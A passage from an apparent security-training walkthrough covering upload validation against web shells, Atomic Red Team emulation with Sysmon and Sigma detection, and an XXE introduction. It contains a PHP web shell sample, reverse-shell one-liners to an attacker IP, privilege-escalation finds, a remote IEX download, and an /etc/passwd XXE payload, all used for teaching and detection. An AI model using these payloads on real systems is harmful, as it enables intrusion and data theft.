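    checked for consistency and are never reused for the stored file."""
    if not data:
        raise UploadRejected("empty file")
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    if content_type not in ALLOWED_TYPES:
        raise UploadRejected("content type not allowed: %s" % content_type)
    magic, ext = ALLOWED_TYPES[content_type]
    # the last extension is what the web server uses to pick a handler, so check that one
    if os.path.splitext(claimed_name)[1].lower() not in (".png", ".jpg", ".jpeg"):
        raise UploadRejected("extension not allowed")
    if not data.startswith(magic):
        raise UploadRejected("content does not match the claimed image type")
    # Magic bytes are cheap to fake (a PHP payload can simply follow a PNG header), so
    # refuse obvious script markers too. The robust version re-encodes the image with an
    # image library, which drops everything that is not pixel data.
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise UploadRejected("script markers inside image data")
    # random name plus a fixed extension: the attacker controls neither where the file
    # lands nor which handler serves it
    return secrets.token_hex(16) + ext


def check_upload(data, claimed_name, content_type):
    """Convenience wrapper returning ('ok', stored_name) or ('rejected', reason)."""
    try:
        return ("ok", validate_image(data, claimed_name, content_type))
    except UploadRejected as err:
        return ("rejected", str(err))


def store_upload(data, claimed_name, content_type, upload_root):
    """Write an accepted upload under upload_root, which must be a directory the web server
    serves as static files only (no script handler mapped to it) or, better, a directory
    outside the web root that the application streams files from."""
    stored_name = validate_image(data, claimed_name, content_type)
    with open(os.path.join(upload_root, stored_name), "wb") as fh:
        fh.write(data)
    return stored_name


# Constructed inputs: the web shell from the task, a minimal PNG, and a polyglot of both
PHP_SHELL = b"<?php system($_GET['command'] . ' 2>&1'); ?>"
REAL_PNG = b"\x89PNG\r\n\x1a\n" + bytes(64)
POLYGLOT = REAL_PNG + PHP_SHELL

if __name__ == "__main__":
    for payload, name, ctype in [(PHP_SHELL, "shell.php", "application/x-httpd-php"),
                                 (PHP_SHELL, "shell.png", "image/png"),
                                 (POLYGLOT, "avatar.png", "image/png"),
                                 (REAL_PNG, "me.png", "image/png")]:
        print(name, ctype, "->", check_upload(payload, name, ctype))
```

The validation is only half of the fix. The directory the application writes to must not have a script handler mapped to it, otherwise a single gap in the checks is again remote code execution; with Apache and mod_php that is a `<Directory>` block for the upload path with `php_admin_flag engine off`, and with any server it is simpler still to keep uploads outside the web root and serve them through the application.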
Here are some examples of commands you could run once you have gained access, and why you might run them (assuming the target runs a Linux OS, like our example system):
* ls: an idea of what files and directories surround you
* cat: outputs the contents of files such as text files
* pwd: where in the file system you are
* whoami: which user you are running as
* hostname: the system's name and potentially its role in the network
* uname -a: system information such as the OS, kernel version, and more
* id: the current user's UID, GID and group memberships
* ifconfig: the system's network setup (on newer systems use ip a, as ifconfig may not be installed)
* bash -i >& /dev/tcp/<your-ip>/<port> 0>&1: starts a reverse shell via bash (relies on bash's /dev/tcp support)
* nc -e /bin/sh <your-ip> <port>: starts a reverse shell via netcat (only on netcat builds that support -e)
* find / -perm -4000 -type f 2>/dev/null: finds SUID (Set User ID) files, useful in privilege escalation attempts because such a binary runs with the privileges of its owner, which is often root
* find / -writable -type f 2>/dev/null | grep -v "/proc/": also useful in privilege escalation attempts, finds files you can write to
These are just some of the commands that can be run following a successful RCE exploit. It's very open-ended, and what you can do depends on your ability to inspect an environment and on the vulnerabilities in the system itself.

PRACTICAL
Your task today is two-fold. First, access Kibana on MACHINE_IP:5601 to investigate the attack and answer the blue questions below. Then proceed to Frosty Pines Resort's website at http://frostypines.thm and recreate the attack to answer the red questions and tell the developers which element of the website was vulnerable. Please note, to access http://frostypines.thm, you will need to reference it in your hosts file.
On the AttackBox, this can be done by executing the following command in a terminal:
echo "MACHINE_IP frostypines.thm" >> /etc/hosts
If you do not see an IP address (i.e. 10.10.x.x) and only MACHINE_IP, ensure that you have started the target machine by pressing the green "Start Machine" button further up the task, under the heading "Connecting to the Machine". To review the logs of the attack on Frosty Pines Resorts, make sure you select the "frostypines-resorts" collection within ELK. The date and time range you need when reviewing the logs is between 11:30 and 12:00 on October 3rd 2024.

Answer the questions below
* BLUE: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php
* BLUE: What IP address accessed the web shell?
* RED: What is the contents of the flag.txt?
* If you liked today's task, you can learn how to harness the power of advanced ELK queries.

Task 10 Atomic Red Team
Day 4: I'm all atomic inside!
Task includes a deployable machine

The Story
SOC-mas is approaching! And the town of Wareville has started preparations for the grand event. Glitch, a quiet, talented SOC-mas security engineer, had a hunch that this year's celebrations would be different. With looming threats, he decided to revamp the town's security defences. Glitch began to fortify them quietly and meticulously. He started by implementing a protective firewall, patching vulnerabilities, and accessing endpoints to patch them for security vulnerabilities. As he worked tirelessly, he left "breadcrumbs", small traces of his activity.
Unaware of Glitch's good intentions, the SOC team spotted anomalies: logs showing admin access, escalation of privileges, patched systems behaving differently, and security tools triggering alerts. The SOC team misinterpreted the system modifications as a sign of an insider threat or rogue attacker and decided to launch an investigation using the Atomic Red Team framework.

LEARNING OBJECTIVES

* Learn how to identify malicious techniques using the MITRE ATT&CK framework.
* Learn how to use Atomic Red Team tests to conduct attack simulations.
* Understand how to create alerting and detection rules from the attack tests.

CONNECTING TO THE MACHINE

Click on the green Start Machine button below to start the virtual machine and wait 1-2 minutes for the system to boot completely in a split-screen view. If the virtual machine isn't visible, use the blue Show Split View button at the top of the page. Additionally, if you wish to connect to the machine via RDP, use the credentials below:

* Username: Administrator
* Password: Emulation101!
* IP: MACHINE_IP

The VM has Atomic Red Team and Sysmon installed. This will allow us to emulate an attack using TTPs described in the MITRE ATT&CK framework.

DETECTION GAPS

While it might be the utopian dream of every blue teamer, we will rarely be able to detect every attack or step in an attack kill chain. This is a reality that all blue teamers face: there are gaps in their detection. But worry not! These gaps do not have to be the size of black holes; there are things we can do to help make these gaps smaller. Detection gaps usually exist for one of two main reasons:

* Security is a cat-and-mouse game. As we detect more, the threat actors and red teamers will find new sneaky ways to thwart our detection. We then need to study these novel techniques and update our signature and alert rules to detect them.
* The line between anomalous and expected behaviour is often very fine and sometimes even has significant overlap. For example, let's say we are a company based in the US. We expect to see almost all of our logins come from IP addresses in the US. One day, we get a login event from an IP in the EU, which would be an anomaly. However, it could also be our CEO travelling for business. This is an example where normal and malicious behaviour intertwine, making it hard to create accurate detection rules that would not produce too much noise.

Blue teams constantly refine and improve their detection rules to close the gaps they experience due to the two reasons mentioned above. Let's take a look at how this can be done!

CYBER ATTACKS AND THE KILL CHAIN

Before diving into creating new detection rules, we first have to discuss some key topics. The first topic to discuss is the Cyber Kill Chain. All cyber attacks follow a fairly standard process, which is explained quite well by the Unified Cyber Kill Chain.

As a blue teamer, it would be our dream to prevent all attacks at the start of the kill chain, so that even when threat actors start their reconnaissance, we already stop them dead in their tracks. But, as discussed before, this is not possible. The goal then shifts slightly. If we are unable to fully detect and prevent a threat actor at any one phase in the kill chain, the goal becomes to perform detections across the entire kill chain in such a way that even if there are detection gaps in a single phase, the gap is covered in a later phase. The goal is, therefore, to ensure we can detect the threat actor before the very last phase of goal execution.

MITRE ATT&CK

A popular framework for understanding the different techniques and tactics that threat actors perform through the kill chain is the MITRE ATT&CK framework. The framework is a collection of tactics, techniques, and procedures (TTPs) that have been observed being used by real threat actors.
The framework provides a navigator tool where these TTPs can be investigated. However, the framework primarily discusses these TTPs in a theoretical manner. Even if we know we have a gap for a specific TTP, we don't really know how to test the gap or close it down. This is where the Atomics come in!

ATOMIC RED

The Atomic Red Team library is a collection of red team test cases that are mapped to the MITRE ATT&CK framework. The library consists of simple test cases that can be executed by any blue team to test for detection gaps and help close them down. The library also supports automation, where the techniques can be executed automatically. However, it is also possible to execute them manually.

DROPPING THE ATOMIC

McSkidy has a vague idea of what happened to the "compromised machine". It seems someone tried to use Atomic Red Team to emulate an attack on one of our systems without permission. The perpetrator also did not clean up the test artefacts. Let's have a look at what happened.

RUNNING AN ATOMIC

McSkidy suspects that the supposed attacker used the MITRE ATT&CK technique T1566.001 Spearphishing Attachment. Let's recreate the attack emulation performed by the supposed attacker and then look for the artefacts created. Open up a PowerShell prompt as administrator and follow along with us. Let's start by having a quick peek at the help page. Enter the command Get-Help Invoke-AtomicTest.
You should see the output below:

```powershell
PS C:\Users\Administrator> Get-Help Invoke-AtomicTest

NAME
    Invoke-AtomicTest

SYNTAX
    Invoke-AtomicTest [-AtomicTechnique] <string[]> [-ShowDetails] [-ShowDetailsBrief] [-TestNumbers <string[]>] [-TestNames <string[]>] [-TestGuids <string[]>] [-PathToAtomicsFolder <string>] [-CheckPrereqs] [-PromptForInputArgs] [-GetPrereqs] [-Cleanup] [-NoExecutionLog] [-ExecutionLogPath <string>] [-Force] [-InputArgs <hashtable>] [-TimeoutSeconds <int>] [-Session <PSSession[]>] [-Interactive] [-KeepStdOutStdErrFiles] [-LoggingModule <string>] [-WhatIf] [-Confirm] [<CommonParameters>]

ALIASES
    None

REMARKS
    None
```

The help above only shows what parameters are available without any explanation. Even though most parameter names are self-explanatory, let us have a quick overview of the parameters we will use in this walkthrough:

* -AtomicTechnique: Defines what technique you want to emulate. You can use the complete technique name or the "TXXXX" value. The parameter name itself can be omitted because it is positional. Example: Invoke-AtomicTest -AtomicTechnique T1566.001
* -ShowDetails: Shows the details of each test included in the Atomic. Example: Invoke-AtomicTest T1566.001 -ShowDetails
* -ShowDetailsBrief: Shows the title of each test included in the Atomic. Example: Invoke-AtomicTest T1566.001 -ShowDetailsBrief
* -CheckPrereqs: Checks whether all necessary components are present for testing. Example: Invoke-AtomicTest T1566.001 -CheckPrereqs
* -TestNames: Sets the tests you want to execute using the complete Atomic Test Name. Example: Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing Attachment"
* -TestGuids: Sets the tests you want to execute using the unique test identifier. Example: Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306
* -TestNumbers: Sets the tests you want to execute using the test number. The scope is limited to the Atomic Technique. Example: Invoke-AtomicTest T1566.001 -TestNumbers 2,3
* -Cleanup: Runs the cleanup commands that were configured to revert your machine state to normal. Example: Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup

Our First Command

We can build our first command now that we know which parameters are available. We would like to know more about what exactly happens when we test the technique T1566.001. To get this information, we must include the name of the technique we want information about and then add the flag -ShowDetails to our command. Let's have a look at the command we constructed: Invoke-AtomicTest T1566.001 -ShowDetails. This command displays the details of all tests included in the T1566.001 Atomic.

```powershell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -ShowDetails
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Download Macro-Enabled Phishing Attachment
Atomic Test Number: 1
Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.

Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
$url = 'http://localhost/PhishingAttachment.xlsm'
Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm

Cleanup Commands:
Command:
Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore
[!!!!!!!!END TEST!!!!!!!]
```
```powershell
[********BEGIN TEST*******]
Technique: Phishing: Spearphishing Attachment T1566.001
Atomic Test Name: Word spawned a command shell and used an IP address in the command line
Atomic Test Number: 2
Atomic Test GUID: cbb6799a-425c-4f83-9194-5447a909d67f
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indicator of malicious activity. Upon execution, CMD will be launched and ping 8.8.8.8

Attack Commands:
Executor: powershell
ElevationRequired: False
Command:
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"

Command (with inputs):
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = "   Open `"C:\Users\Public\art.jse`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"

Cleanup Commands:
Command:
Remove-Item #{jse_path} -ErrorAction Ignore
Command (with inputs):
Remove-Item C:\Users\Public\art.jse -ErrorAction Ignore

Dependencies:
Description: Microsoft Word must be installed
Check Prereq Command:
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
Check Prereq Command (with inputs):
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }
Get Prereq Command:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Get Prereq Command (with inputs):
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
[!!!!!!!!END TEST!!!!!!!]
```

The output above is clearly split up into multiple parts, each matching a test. Let's examine what type of information is provided in a test. We will use the test we want to run as an example.

* Technique: Phishing: Spearphishing Attachment T1566.001. The full name of the MITRE ATT&CK technique that will be tested.
* Atomic Test Name: Download Macro-Enabled Phishing Attachment. A descriptive name of the type of test that will be executed.
* Atomic Test Number: 1. A number assigned to the test; we can use this in the command to specify which test we want to run.
* Atomic Test GUID: 114ccff9-ae6d-4547-9ead-4cd69f687306. A unique ID assigned to this test; we can use this in the command to specify which test we want to run.
* Description: This atomic test downloads a macro-enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file. The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory. Provides a detailed explanation of what the test will do.
* Attack commands: Executor: powershell; ElevationRequired: False; Command: $url = 'http://localhost/PhishingAttachment.xlsm' followed by Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm. This provides an overview of all the commands run during the test, including the executor of those commands and the required privileges. It also helps us determine where to look for artefacts in Windows Event Viewer.
* Cleanup commands: Command: Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction Ignore. An overview of the commands executed to revert the machine back to its original state.
* Dependencies: There are no dependencies required. An overview of all required resources that must be present on the testing machine in order to execute the test.

Phishing: Spearphishing Attachment T1566.001 Emulated

Let's continue and run the first test of T1566.001. Before running the emulation, we should ensure that all required resources are in place to conduct it successfully. To verify this, we can add the flag -CheckPrereqs to our command (PowerShell also accepts the shorter, unambiguous prefix -CheckPrereq used below). The command should look something like this: Invoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereq. This command will use the data included in the "Dependencies" part of the test details to verify whether all required resources are present. Looking at the test 1 dependencies of the T1566.001 Atomic, no additional resources are required. Run the same command for test 2, and it will state that Microsoft Word needs to be installed, as shown below:

```powershell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 2 -CheckPrereq
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

CheckPrereq's for: T1566.001-2 Word spawned a command shell and used an IP address in the command line
Prerequisites not met: T1566.001-2 Word spawned a command shell and used an IP address in the command line
 [*] Microsoft Word must be installed

Try installing prereq's with the -GetPrereqs switch
```

Now that we have verified the dependencies, let us continue with the emulation. Execute the following command to start the emulation: Invoke-AtomicTest T1566.001 -TestNumbers 1 and you should get the following output:

```powershell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
```

Based on the output, we can determine that the test was successfully executed.
We can now analyse the logs in the Windows Event Viewer to find Indicators of Attack and Compromise.

DETECTING THE ATOMIC

Now that we have executed the T1566.001 Atomic, we can look for log entries that point us to this emulated attack. For this purpose, we will use the Windows Event Logs. This machine comes with Sysmon installed. System Monitor (Sysmon) provides us with detailed information about process creation, network connections, and changes to file creation time. To make it easier for us to pick up the events created for this emulation, we will first clean up the files from the previous test by running the command Invoke-AtomicTest T1566.001 -TestNumbers 1 -Cleanup.

```powershell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1 -Cleanup
```

Now, we will clear the Sysmon event log:

* Open up Event Viewer by clicking the icon in the taskbar, or by searching for it in the Start Menu.
* Navigate to Applications and Services => Microsoft => Windows => Sysmon => Operational on the left-hand side of the screen.
* Right-click Operational on the left-hand side of the screen and click Clear Log. Click Clear when the popup shows.

Now that we have cleaned up the files and the Sysmon logs, let us run the emulation again by issuing the command Invoke-AtomicTest T1566.001 -TestNumbers 1.

```powershell
PS C:\Users\Administrator> Invoke-AtomicTest T1566.001 -TestNumbers 1
PathToAtomicsFolder = C:\Tools\AtomicRedTeam\atomics

Executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
Done executing test: T1566.001-1 Download Macro-Enabled Phishing Attachment
```

Next, go to the Event Viewer, right-click on the Operational log on the left-hand side of the screen and then click on Refresh. There should be new events related to the emulated attack. Now sort the table on the Date and Time column to order the events chronologically (oldest first).
The first two events of the list are tests that Atomic executes for every emulation. We are interested in two events that detail the attack:

* First, a process was created (Sysmon Event ID 1) for PowerShell to execute the following command: "powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}
* Then, a file was created (Sysmon Event ID 11) with the name PhishingAttachment.xlsm.

Click on each event to see the details. When you select an event, you should see a detailed overview of all the data collected for that event. Click on the Details tab to show all the EventData in a readable format. Fields such as Image, CommandLine and TargetFilename are valuable for incident response and for creating alerting rules.

Navigate to the directory C:\Users\Administrator\AppData\Local\Temp\, and open the file PhishingAttachment.txt. The flag included is the answer to question 1. Make sure to answer the question now, as the cleanup command will delete this file.

Let's clean up the artefacts from our spearphishing emulation. Enter the command Invoke-AtomicTest T1566.001-1 -Cleanup. Now that we know which artefacts were created during this spearphishing emulation, we can use them to create custom alerting rules. In the next section, we will explore this topic further.

ALERTING ON THE ATOMIC

In the previous section, we found multiple indicators of compromise through the Sysmon event log. We can use this information to create detection rules to include in our EDR, SIEM, IDS, etc. These tools offer functionality that allows us to import custom detection rules. There are several detection rule formats, including YARA, Sigma, Snort, and more. Let's look at how we can use the artefacts related to T1566.001 to create a custom Sigma rule. Two events contained possible indicators of compromise.
Let's focus on the event that contained the Invoke-WebRequest command line: "powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}

We can use multiple parts of this artefact in our custom Sigma rule:

* Invoke-WebRequest: It is not common for this cmdlet to run from a script behind the scenes.
* $url = 'http://localhost/PhishingAttachment.xlsm': Attackers often use a specific malicious domain to host their payloads. Including the malicious URL in the Sigma rule could help us detect that specific URL.
* PhishingAttachment.xlsm: This is the malicious payload downloaded and saved on our system. We can include its name in the Sigma rule as well.

Combining all these pieces of information in a Sigma rule would look something like this:

```yaml
title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 1
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
  category: process_creation
  product: windows
  service: sysmon
detection:
  selection_invoke_webrequest:
    EventID: 1
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'http://localhost/PhishingAttachment.xlsm'
  selection_file_creation:
    EventID: 11  # Sysmon Event ID for File Creation
    TargetFilename|endswith: '\PhishingAttachment.xlsm'
  condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
  - Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
  - attack.t1071.001  # Web Service - Application Layer Protocol
  - attack.t1059.001  # PowerShell
  - attack.t1105      # Ingress Tool Transfer
  - attack.t1566.001  # Spearphishing Attachment
```

The detection part is where the effective detection is happening. Three things are worth tightening before importing a rule like this into a real pipeline: a list under CommandLine|contains is matched as OR, so any Invoke-WebRequest on the host would fire the first selection (use CommandLine|contains|all to require both strings); the id field is expected to be a unique UUID rather than 1; and Sysmon Event ID 11 belongs to the file_event logsource category, not process_creation, so most Sigma backends expect the file-creation selection in a separate rule with its own logsource.
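To see how the detection block above behaves on actual events, here is an added example (not code from the TryHackMe room) that implements the subset of Sigma matching the rule uses and runs both the page's rule and a tightened variant over constructed Sysmon-style events. The two malicious events mirror the ones the walkthrough found; the two benign events, the field values, and the function names are this example's own assumptions.

```python
"""Added example: evaluate a Sigma-style detection block over Sysmon-style events.

Supports exact match, |contains, |endswith, |startswith, the |all modifier, and a
flat 'a or b' / 'a and b' condition. Events are hand-constructed; nothing is read
from a real Event Log. Real pipelines should use sigma-cli/pySigma instead."""

from typing import Any, Dict, List

Event = Dict[str, str]

# Constructed sample events (field names follow Sysmon EventData).
SAMPLE_EVENTS: List[Event] = [
    {  # Sysmon 1: the Atomic's PowerShell download, as seen in the walkthrough
        "EventID": "1",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "\"powershell.exe\" & {$url = 'http://localhost/PhishingAttachment.xlsm' "
                       "Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm}",
    },
    {  # Sysmon 11: the file landing in %TEMP%
        "EventID": "11",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "TargetFilename": "C:\\Users\\Administrator\\AppData\\Local\\Temp\\PhishingAttachment.xlsm",
    },
    {  # benign (constructed): an admin fetching an installer from an internal server
        "EventID": "1",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe Invoke-WebRequest -Uri https://files.internal/setup.msi -OutFile C:\\Temp\\setup.msi",
    },
    {  # benign (constructed): Excel saving an unrelated workbook
        "EventID": "11",
        "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
        "TargetFilename": "C:\\Users\\Administrator\\Documents\\Budget.xlsx",
    },
]

# The page's detection block, transcribed as a dict.
PAGE_DETECTION: Dict[str, Any] = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains": ["Invoke-WebRequest", "http://localhost/PhishingAttachment.xlsm"],
    },
    "selection_file_creation": {
        "EventID": 11,
        "TargetFilename|endswith": "\\PhishingAttachment.xlsm",
    },
    "condition": "selection_invoke_webrequest or selection_file_creation",
}

# Same rule with |all, so both strings must appear in the command line.
TIGHT_DETECTION: Dict[str, Any] = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains|all": ["Invoke-WebRequest", "http://localhost/PhishingAttachment.xlsm"],
    },
    "selection_file_creation": PAGE_DETECTION["selection_file_creation"],
    "condition": PAGE_DETECTION["condition"],
}


def field_matches(event: Event, key: str, expected: Any) -> bool:
    """Evaluate one 'Field|modifier' entry. Sigma string matching is case-insensitive."""
    field, *mods = key.split("|")
    if field not in event:
        return False
    actual = str(event[field]).lower()
    wanted = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    if "contains" in mods:
        hits = [w in actual for w in wanted]
    elif "endswith" in mods:
        hits = [actual.endswith(w) for w in wanted]
    elif "startswith" in mods:
        hits = [actual.startswith(w) for w in wanted]
    else:
        hits = [actual == w for w in wanted]
    return all(hits) if "all" in mods else any(hits)  # list values are OR unless |all


def selection_matches(event: Event, selection: Dict[str, Any]) -> bool:
    """Every field in a selection map must match (fields are ANDed)."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def evaluate(detection: Dict[str, Any], event: Event) -> bool:
    """Evaluate a flat condition such as 'sel_a or sel_b' left to right."""
    result, op = None, None
    for token in detection["condition"].split():
        if token in ("or", "and"):
            op = token
            continue
        value = selection_matches(event, detection[token])
        if result is None:
            result = value
        else:
            result = (result or value) if op == "or" else (result and value)
    return bool(result)


def firing_events(detection: Dict[str, Any], events: List[Event]) -> List[int]:
    """Indices of the events that would raise the alert."""
    return [i for i, e in enumerate(events) if evaluate(detection, e)]


if __name__ == "__main__":
    print("page rule fires on  :", firing_events(PAGE_DETECTION, SAMPLE_EVENTS))   # [0, 1, 2]
    print("tightened rule fires:", firing_events(TIGHT_DETECTION, SAMPLE_EVENTS))  # [0, 1]
```

The page's rule fires on the benign installer download as well as on the two emulation events, because the OR semantics of the list let Invoke-WebRequest alone satisfy the selection; the |all variant keeps the two true positives and drops the benign one. The Excel save never matches either rule since the file name does not end in \PhishingAttachment.xlsm.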
We can clearly see the artefacts that we discovered during the emulation test. We can then import this rule into the main tools we use for alerts, such as the EDR, SIEM, XDR, and many more. Now that Glitch has shown us his intentions, let's continue with his work and run an emulation for ransomware.

CHALLENGE

As Glitch continues to prepare for SOC-mas and fortifies Wareville's security, he decides to conduct an attack simulation that would mimic a ransomware attack across the environment. He is unsure of the correct detection metrics to implement for this test and asks you for help. Your task is to identify the correct atomic test to run that will take advantage of a command and scripting interpreter, conduct the test, and extract valuable artefacts that would be used to craft a detection rule.

Answer the questions below

* What was the flag found in the .txt file that is found in the same directory as the PhishingAttachment.xlsm artefact?
* What ATT&CK technique ID would be our point of interest?
* What ATT&CK subtechnique ID focuses on the Windows Command Shell?
* What is the name of the Atomic Test to be simulated?
* What is the name of the file used in the test?
* What is the flag found from this Atomic Test?

Learn more about the Atomic Red Team via the linked room.

Task 11 XXE
Day 5: SOC-mas XX-what-ee?

The Story

The days in Wareville flew by, and Software's projects were nearly complete, just in time for Christmas. One evening, after wrapping up work, Software was strolling through the town when he came across a young boy looking dejected. Curious, Software asked, "What would you like for Christmas?" The boy replied with a sigh, "I wish for a teddy bear, but I know that my family can't afford one."
This brief conversation sparked an idea in Software's mind: what if there was a platform where everyone in town could share their Christmas wishes, and the Mayor's office could help make them come true? Excited by the potential, Software introduced the idea to Mayor Malware, who embraced it immediately. The Mayor encouraged the team to build the platform for the people of Wareville. Through the developers' dedication and effort, the platform was soon ready and became an instant hit. The townspeople loved it! However, in their rush to meet the holiday deadline, the team had overlooked something critical: thorough security testing. Even Mayor Malware had chipped in to help develop a feature in the final hours. Now, it's up to you to ensure the application is secure and free of vulnerabilities. Can you guarantee the platform runs safely for the people of Wareville?

Learning Objectives

* Understand the basic concepts related to XML
* Explore XML External Entity (XXE) and its components
* Learn how to exploit the vulnerability
* Understand remediation measures

Important Concepts

Extensible Markup Language (XML)

XML is a commonly used method to transport and store data in a structured format that humans and machines can easily understand. Consider a scenario where two computers need to communicate and share data. Both devices need to agree on a common format for exchanging information. This agreement (format) is known as XML. You can think of XML as a digital filing cabinet. Just as a filing cabinet has folders with labelled documents inside, XML uses tags to label and organise information. These tags are like folders that define the type of data stored.
This is what an XML document looks like, a simple piece of text information organised in a structured manner:

```xml
<people>
  <name>Glitch</name>
  <address>Wareville</address>
  <email>glitch@wareville.com</email>
  <phone>111000</phone>
</people>
```

In this case, the tags <people>, <name>, <address>, etc. are like folders in a filing cabinet, but now they store data about Glitch. The content inside the tags, like "Glitch", "Wareville", and "111000", represents the actual data being stored. Like before, the key benefit of XML is that it is easily shareable and customisable, allowing you to create your own tags.

Document Type Definition (DTD)

Now that the two computers have agreed to share data in a common format, what about the structure of the format? This is where the DTD comes into play. A DTD is a set of rules that defines the structure of an XML document. Just like a database schema, it acts like a blueprint, telling you what elements (tags) and attributes are allowed in the XML file. Think of it as a guideline that ensures the XML document follows a specific structure. For example, if we want to ensure that an XML document about people will always include a name, address, email, and phone number, we would define those rules through a DTD as shown below:

```xml
<!DOCTYPE people [
  <!ELEMENT people (name, address, email, phone)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT address (#PCDATA)>
  <!ELEMENT email (#PCDATA)>
  <!ELEMENT phone (#PCDATA)>
]>
```

In the above DTD, <!ELEMENT> defines the elements (tags) that are allowed, like name, address, email, and phone, whereas #PCDATA stands for parsed character data, meaning the element will consist of just plain text.

Entities

So far, both computers have agreed on the format, the structure of data, and the type of data they will share. Entities in XML are placeholders that allow the insertion of large chunks of data or referencing internal or external files. They assist in making the XML file easy to manage, especially when the same data is repeated multiple times.
Entities can be defined internally within the XML document or externally, referencing data from an outside source. For example, an external entity references data from an external file or resource. In the following code, the entity &ext; refers to an external resource located at "http://tryhackme.com/robots.txt", which would be loaded into the XML, if allowed by the system:

```xml
<!DOCTYPE people [
  <!ENTITY ext SYSTEM "http://tryhackme.com/robots.txt">
]>
<people>
  <name>Glitch</name>
  <address>&ext;</address>
  <email>glitch@wareville.com</email>
  <phone>111000</phone>
</people>
```

We are specifically discussing external entities because they are one of the main reasons XXE is introduced when they are not properly managed.

XML External Entity (XXE)

After understanding XML and how entities work, we can now explore the XXE vulnerability. XXE is an attack that takes advantage of how XML parsers handle external entities. When a web application processes an XML file that contains an external entity, the parser attempts to load whatever resource the entity points to. If the necessary restrictions are not in place, the attacker may point the entity to any file or URL, causing undesired behaviour in the web app. For example, consider a vulnerable XML parser processing this external entity definition:

```xml
<!DOCTYPE people [
  <!ENTITY thmFile SYSTEM "file:///etc/passwd">
]>
<people>
  <name>Glitch</name>
  <address>&thmFile;</address>
  <email>glitch@wareville.com</email>
  <phone>111000</phone>
</people>
```

